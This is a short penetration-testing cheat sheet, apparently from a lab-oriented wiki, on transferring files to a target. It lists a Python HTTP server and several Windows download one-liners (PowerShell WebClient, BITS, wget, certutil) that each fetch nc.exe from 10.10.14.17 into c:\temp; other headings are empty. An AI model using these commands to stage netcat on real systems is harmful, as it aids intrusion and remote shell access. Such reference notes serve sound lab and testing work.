File Transfer
Download
HTTP Server with Python
python3 -m http.server 80
python2 -m SimpleHTTPServer 80Curl
curl -O http://host/filePowershell
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.17/nc.exe','c:\temp\nc.exe')
powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.17/nc.exe -Destination C:\temp\nc.exe")
powershell.exe wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"Cetutil
certutil.exe -urlcache -split -f "http://10.10.14.17/nc.exe" c:\temp\nc.exeBitsadmin
Netcat
SMB
SCP
Upload
Curl
Link
Last updated
Was this helpful?